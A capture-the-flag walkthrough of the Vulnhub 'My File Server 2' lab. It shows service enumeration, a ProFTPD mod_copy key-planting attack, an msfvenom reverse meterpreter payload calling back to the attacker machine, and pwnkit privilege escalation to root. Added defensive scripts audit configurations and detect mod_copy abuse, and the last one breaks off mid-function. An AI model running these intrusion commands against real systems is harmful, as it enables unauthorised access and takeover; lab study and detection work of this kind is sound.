Vulnhub: My File Server 2 detailed walkthrough (local privilege escalation with Metasploit feels great)
My File Server 2
Author: jason huawen
Target information
Name: My File Server: 2
Address:
https://www.vulnhub.com/entry/my-file-server-2,442/
Import the target VM into VirtualBox and set its network mode to host-only so that it shares a LAN with the Kali Linux attacking machine.
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:15:69:14 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:4f:61:58 1 60 PCS Systemtechnik GmbH
Using Kali Linux's netdiscover, the target host's IP address is identified as 192.168.56.104.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 21:40 EDT
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00052s latency).
Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 35080/tcp nlockmgr
| 100021 1,3,4 40393/udp6 nlockmgr
| 100021 1,3,4 45446/tcp6 nlockmgr
| 100021 1,3,4 60480/udp nlockmgr
| 100024 1 36358/udp6 status
| 100024 1 48374/udp status
| 100024 1 51953/tcp status
| 100024 1 58193/tcp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:4F:61:58 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-03T01:41:43
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-04-03T07:11:44+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.49 seconds
Getting a shell
Since the target has several open ports, each one has to be enumerated in turn.
Port 21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5547|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 16 Feb 18 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxrwxrwx 3 0 0 16 Feb 19 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5861|).
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 16 Feb 19 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxr-xr-x 9 0 0 4096 Feb 19 2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5001|).
150 Here comes the directory listing.
drwxr-xr-x 9 0 0 4096 Feb 19 2020 .
drwxrwxrwx 3 0 0 16 Feb 19 2020 ..
drwxr-xr-x 2 0 0 4096 Feb 19 2020 anaconda
drwxr-x--- 2 0 0 22 Feb 19 2020 audit
-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log
-rw------- 1 0 0 10752 Feb 19 2020 btmp
-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfs
drwx------ 2 0 0 39 Feb 19 2020 httpd
-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog
-rw------- 1 0 0 3764 Feb 19 2020 maillog
-rw------- 1 0 0 1423423 Feb 19 2020 messages
drwx------ 2 0 0 6 Feb 19 2020 ppp
drwx------ 4 0 0 43 Feb 19 2020 samba
-rw------- 1 0 0 63142 Feb 19 2020 secure
-rw------- 1 0 0 0 Feb 19 2020 spooler
-rw------- 1 0 0 0 Feb 19 2020 tallylog
drwxr-xr-x 2 0 0 22 Feb 19 2020 tuned
-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp
-rw------- 1 0 0 100 Feb 19 2020 xferlog
-rw------- 1 0 0 18076 Feb 19 2020 yum.log
226 Directory send OK.
Although the target allows anonymous login, the files in this directory are of little value.
Port 445
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient -L 192.168.56.104
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)
Unable to connect with SMB1 -- no workgroup available
There are two shared directories: smbdata and smbuser.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Feb 21 01:50:09 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
authorized_keys A 389 Fri Feb 21 01:50:09 2020
19976192 blocks of size 1024. 18285180 blocks available
smb: \> get authorized_keys
getting file \authorized_keys of size 389 as authorized_keys (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\
smb: \> put test.txt
putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)
- Files can be uploaded to the smbdata share. This is important: a specific file can be uploaded there later.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
- Anonymous access to the smbuser share is not allowed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ enum4linux 192.168.56.104
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\smbuser (Local User)
enum4linux identifies the username smbuser.
Port 2121
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104 -P 2121
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||65233|)
ftp: Can't connect to `192.168.56.104:65233': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 root root 16 Feb 18 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxrwxrwx 3 root root 16 Feb 19 2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 16 Feb 19 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxr-xr-x 9 root root 4.0k Feb 19 2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 9 root root 4.0k Feb 19 2020 .
drwxrwxrwx 3 root root 16 Feb 19 2020 ..
drwxr-xr-x 2 root root 4.0k Feb 19 2020 anaconda
drwxr-x--- 2 root root 22 Feb 19 2020 audit
-rw-r--r-- 1 root root 6.9k Feb 19 2020 boot.log
-rw------- 1 root root 10.5k Feb 19 2020 btmp
-rw-r--r-- 1 root root 8.9k Feb 19 2020 cron
-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg
-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg.old
drwxr-xr-x 2 root root 6 Feb 19 2020 glusterfs
drwx------ 2 root root 39 Feb 19 2020 httpd
-rw-r--r-- 1 root root 285.7k Feb 19 2020 lastlog
-rw------- 1 root root 3.7k Feb 19 2020 maillog
-rw------- 1 root root 1.4M Feb 19 2020 messages
drwx------ 2 root root 6 Feb 19 2020 ppp
drwx------ 4 root root 43 Feb 19 2020 samba
-rw------- 1 root root 61.7k Feb 19 2020 secure
-rw------- 1 root root 0 Feb 19 2020 spooler
-rw------- 1 root root 0 Feb 19 2020 tallylog
drwxr-xr-x 2 root root 22 Feb 19 2020 tuned
-rw-r--r-- 1 root root 57.4k Feb 19 2020 wtmp
-rw------- 1 root root 100 Feb 19 2020 xferlog
-rw------- 1 root root 17.7k Feb 19 2020 yum.log
226 Transfer complete
- Anonymous FTP access is allowed
- The directory contents are the same as those already seen on port 21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ searchsploit ProFTPD 1.3.5
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- A command execution vulnerability exists
However, exploiting this vulnerability through Metasploit did not succeed, so the mod_copy vulnerability still has to be used to place a locally generated id_rsa.pub into smbuser's home directory:
first upload id_rsa.pub to the /smbdata directory over SMB, then use the mod_copy vulnerability to copy the file to its destination and rename it authorized_keys.
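Before the exploitation steps, here is the defender's view of the same three weaknesses. The Python script below is an added example written for this walkthrough, not code from the original post or from any of the services involved: it audits vsftpd.conf, smb.conf and proftpd.conf for anonymous FTP login and upload, for Samba shares that are both guest-accessible and writable, and for mod_copy being left enabled. The three SAMPLE_* configuration texts are constructed to match what the scans above suggest and are not the target's real files; the directive names (anonymous_enable, anon_upload_enable, guest ok, writable, read only, <Anonymous>, CopyEngine) are real vsftpd, Samba and ProFTPD directives.

```python
"""Audit the sharing misconfigurations that make the attack path above possible.

Checks three configuration texts for the settings an anonymous client relied on:
  * vsftpd.conf  : anonymous_enable / anon_upload_enable / anon_mkdir_write_enable
  * smb.conf     : shares that are both guest-accessible and writable
  * proftpd.conf : an <Anonymous> block, and mod_copy left enabled (CopyEngine)
The SAMPLE_* texts are constructed for this example, not the target's real files.
"""
import configparser
import re
from typing import Dict, List

SAMPLE_VSFTPD = """\
# constructed sample vsftpd.conf
anonymous_enable=YES
anon_upload_enable=YES
local_enable=YES
"""

SAMPLE_SMB = """\
# constructed sample smb.conf
[global]
   workgroup = SAMBA
   map to guest = Bad User
[smbdata]
   path = /smbdata
   guest ok = yes
   writable = yes
[smbuser]
   path = /home/smbuser
   valid users = smbuser
   writable = yes
"""

SAMPLE_PROFTPD = """\
# constructed sample proftpd.conf
ServerName "ProFTPD Default Installation"
Port 2121
<Anonymous ~ftp>
  User ftp
  Group ftp
  UserAlias anonymous ftp
</Anonymous>
"""


def parse_kv(text: str) -> Dict[str, str]:
    """Parse vsftpd-style 'key=value' lines; comments and blanks are ignored."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().upper()
    return settings


def audit_vsftpd(text: str) -> List[str]:
    s = parse_kv(text)
    findings = []
    if s.get("anonymous_enable") == "YES":
        findings.append("vsftpd: anonymous_enable=YES (anonymous login allowed)")
        for key in ("anon_upload_enable", "anon_mkdir_write_enable"):
            if s.get(key) == "YES":
                findings.append(f"vsftpd: {key}=YES (anonymous users can write)")
    return findings


def audit_smb(text: str) -> List[str]:
    # smb.conf is INI-like; indentation is stripped so configparser does not
    # treat indented lines as continuations of the previous value.
    flat = "\n".join(l.strip() for l in text.splitlines())
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(flat)
    findings = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        sec = cp[share]
        guest = sec.get("guest ok", sec.get("public", "no")).strip().lower() == "yes"
        # "writable", "writeable" and "read only = no" are synonyms in Samba
        writable = (sec.get("writable", sec.get("writeable", "no")).strip().lower() == "yes"
                    or sec.get("read only", "yes").strip().lower() == "no")
        if guest and writable:
            findings.append(f"smb: share [{share}] is guest-accessible and writable")
    return findings


def audit_proftpd(text: str) -> List[str]:
    findings = []
    if re.search(r"^\s*<Anonymous\b", text, re.M | re.I):
        findings.append("proftpd: <Anonymous> block present (anonymous login allowed)")
    # "CopyEngine off" disables SITE CPFR/CPTO on builds that provide the directive;
    # without it the copy commands stay available to any logged-in client.
    engine = re.search(r"^\s*CopyEngine\s+(\S+)", text, re.M | re.I)
    if not engine or engine.group(1).lower() != "off":
        findings.append("proftpd: mod_copy not disabled (SITE CPFR/CPTO available)")
    return findings


def audit_all(vsftpd: str, smb: str, proftpd: str) -> List[str]:
    return audit_vsftpd(vsftpd) + audit_smb(smb) + audit_proftpd(proftpd)


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_VSFTPD, SAMPLE_SMB, SAMPLE_PROFTPD):
        print("[!]", finding)
```

Run as-is it prints five findings for the constructed samples; pass the real files' contents to audit_all() to audit a live host. On a ProFTPD 1.3.5 server the CopyEngine check is only a partial answer, since that release is vulnerable by version; the real fix is upgrading or building without mod_copy, and the other two findings are closed by anonymous_enable=NO and guest ok = no on the share.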
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:GXPq6h/MYwYkQIZ6kkCZjVeQq3kZuNlsHcLf+L0RXfw kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|.+O.+. |
|o= = . |
|o.+ o . o . o |
|+..= + *. . . |
| oB * = S. . E |
| = * + * . |
| o . X. |
| = +. |
| .o.... |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put id_rsa.pub
putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ telnet 192.168.56.104 2121
Trying 192.168.56.104...
Connected to 192.168.56.104.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
SITE CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
SITE CPTO /home/smbuser/.ssh/authorized_keys
250 Copy successful
This uses ProFTPD's mod_copy vulnerability to place the id_rsa.pub public key into smbuser's home directory as authorized_keys.
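From the defender's side, the two SITE commands above leave a clear trace in the FTP server log. The Python detector below is an added example for this walkthrough, not code from the original post or from ProFTPD: it reads ProFTPD ExtendedLog lines, pairs each SITE CPFR with the SITE CPTO that follows from the same client and user, and raises the severity when the copy was made by an anonymous user or lands on a sensitive path such as an authorized_keys file. It assumes ProFTPD's built-in "default" LogFormat (%h %l %u %t "%r" %s %b); the lines in SAMPLE_LOG are constructed to mirror the session above and are not real server logs.

```python
"""Detect mod_copy abuse (SITE CPFR / SITE CPTO) in ProFTPD ExtendedLog lines.

Assumes ProFTPD's built-in "default" LogFormat (%h %l %u %t "%r" %s %b), which is
CLF-like. SAMPLE_LOG is constructed for this example and is not a real log.
"""
import re
from typing import Dict, List, Optional

SAMPLE_LOG = """\
192.168.56.230 UNKNOWN anonymous [02/Apr/2023:22:01:10 -0400] "USER anonymous" 331 -
192.168.56.230 UNKNOWN anonymous [02/Apr/2023:22:01:12 -0400] "PASS (hidden)" 230 -
192.168.56.230 UNKNOWN anonymous [02/Apr/2023:22:01:20 -0400] "SITE CPFR /smbdata/id_rsa.pub" 350 -
192.168.56.230 UNKNOWN anonymous [02/Apr/2023:22:01:25 -0400] "SITE CPTO /home/smbuser/.ssh/authorized_keys" 250 -
192.168.56.50 UNKNOWN alice [02/Apr/2023:22:05:00 -0400] "SITE CPFR /home/alice/report.pdf" 350 -
192.168.56.50 UNKNOWN alice [02/Apr/2023:22:05:02 -0400] "SITE CPTO /home/alice/backup/report.pdf" 250 -
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
# Usernames under which an anonymous ProFTPD session is typically logged
ANON_USERS = {"anonymous", "ftp", "-"}
# Destinations that should never be written by an FTP copy
SENSITIVE_DEST = (
    re.compile(r"/\.ssh/authorized_keys$"),
    re.compile(r"^/etc/"),
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one CLF-style ProFTPD log line into its fields, or None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_copies(lines) -> List[Dict[str, object]]:
    """Pair SITE CPFR with the following SITE CPTO per (client, user) and rate each copy."""
    pending: Dict[tuple, str] = {}  # (host, user) -> source path announced by CPFR
    events: List[Dict[str, object]] = []
    for raw in lines:
        rec = parse_line(raw)
        if not rec:
            continue
        verb, _, arg = rec["request"].partition(" ")
        if verb.upper() != "SITE":
            continue
        sub, _, path = arg.partition(" ")
        key = (rec["host"], rec["user"])
        if sub.upper() == "CPFR" and rec["status"] == "350":
            pending[key] = path  # server accepted the source, a CPTO should follow
        elif sub.upper() == "CPTO":
            src = pending.pop(key, None)
            reasons = []
            if rec["user"].lower() in ANON_USERS:
                reasons.append("copy by anonymous user")
            if any(p.search(path) for p in SENSITIVE_DEST):
                reasons.append("sensitive destination")
            events.append({
                "time": rec["time"], "host": rec["host"], "user": rec["user"],
                "source": src or "?", "dest": path,
                "succeeded": rec["status"] == "250",
                "severity": "high" if reasons else "info",
                "reasons": "; ".join(reasons),
            })
    return events


if __name__ == "__main__":
    for ev in detect_copies(SAMPLE_LOG.splitlines()):
        flag = "[!]" if ev["severity"] == "high" else "[*]"
        print(f"{flag} {ev['time']} {ev['host']} {ev['user']}: "
              f"{ev['source']} -> {ev['dest']} ok={ev['succeeded']} {ev['reasons']}")
```

Any SITE CPTO is reported, because legitimate copies are rare enough to review; the anonymous-user and authorized_keys conditions are what separate the session above from the routine copy by alice in the sample.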
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 2 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Fri Feb 21 12:39:36 2020
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
We now have a shell as the user smbuser.
Privilege escalation
Next, Metasploit is used for privilege escalation. First, build the payload with msfvenom:
$ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalator.elf
Upload escalator.elf to the target's /tmp directory and make it executable.
At the same time, start msfconsole on Kali Linux:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.104:41659) at 2023-04-02 22:39:49 -0400
This yields a Meterpreter session, which is then used for privilege escalation.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.56.104 - Collecting local exploits for x86/linux...
[*] 192.168.56.104 - 167 exploit checks are being tried...
[+] 192.168.56.104 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.104 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.104 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable.
3 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
4 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
5 exploit/linux/local/ptrace_sudo_token_priv_esc Yes The service is running, but could not be validated.
6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
Several modules can be used for privilege escalation; the first one is chosen.
meterpreter > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.alwwwbblxxel
[+] The target is vulnerable.
[*] Writing '/tmp/.arzick/ndpnoo/ndpnoo.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.arzick
[*] Sending stage (3020772 bytes) to 192.168.56.104
[+] Deleted /tmp/.arzick/ndpnoo/ndpnoo.so
[+] Deleted /tmp/.arzick/.bawgxle
[+] Deleted /tmp/.arzick
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.104:47993) at 2023-04-02 22:45:10 -0400
id
meterpreter > id
[-] Unknown command: id
meterpreter > getuid
Server username: root
meterpreter > shell
Process 22664 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1000(smbuser)
cd /root
ls -alh
total 44K
drwxr--r--. 4 root root 4.0K Feb 21 2020 .
dr-xr-xr-x. 18 root root 4.0K Feb 18 2020 ..
-rwxr--r--. 1 root root 131 Feb 21 2020 .bash_history
-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc
-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrc
drwxr--r--. 3 root root 18 Feb 18 2020 .pki
drwxr--r-- 2 root root 6 Feb 19 2020 .ssh
-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rwxr--r-- 1 root root 6.2K Feb 21 2020 .viminfo
-rwxr--r-- 1 nobody nobody 48 Feb 20 2020 proof.txt
cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43
We now have a root shell and the root flag.
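The exploit suggester output above marked pkexec as vulnerable to CVE-2021-4034, which is what gave root here. The Python script below is an added example for this walkthrough (not part of the original post): it parses `ls -l` style listings like the ones shown on this page, reports files that are setuid root, and singles out pkexec, because removing its setuid bit is the stop-gap until the patched polkit package is installed. SAMPLE_LISTING is constructed for the example and is not the target's actual listing.

```python
"""Audit setuid binaries from `ls -l` output (the CVE-2021-4034 angle).

Parses long-listing lines of the kind shown on this page and reports regular
files that carry the setuid bit and are owned by root. SAMPLE_LISTING is a
constructed listing for this example, not taken from the target.
"""
import re
from typing import Dict, List, Optional

SAMPLE_LISTING = """\
total 44K
-rwsr-xr-x. 1 root root  23576 Jan 14  2022 /usr/bin/pkexec
-rwsr-xr-x. 1 root root  27832 Jun 10  2014 /usr/bin/passwd
-rwxr-xr-x. 1 root root 117608 Aug 20  2019 /usr/bin/ls
-rwsr-xr-x  1 alice alice  8760 Feb 20  2020 /home/alice/helper
drwxr-xr-x. 2 root root   4096 Feb 19  2020 /usr/local/bin
"""

# type, 9 permission chars, optional SELinux/ACL marker ('.' or '+'), link count,
# owner, group, size, three date tokens, then the path (which may contain spaces)
LS_RE = re.compile(
    r"^(?P<type>[-dlcbps])(?P<perm>[rwxsStT-]{9})[.+]?\s+\d+\s+"
    r"(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>.+)$"
)


def parse_listing(lines) -> List[Dict[str, object]]:
    """Return one record per regular file; directories, links and 'total' are skipped."""
    entries: List[Dict[str, object]] = []
    for line in lines:
        m = LS_RE.match(line.rstrip())
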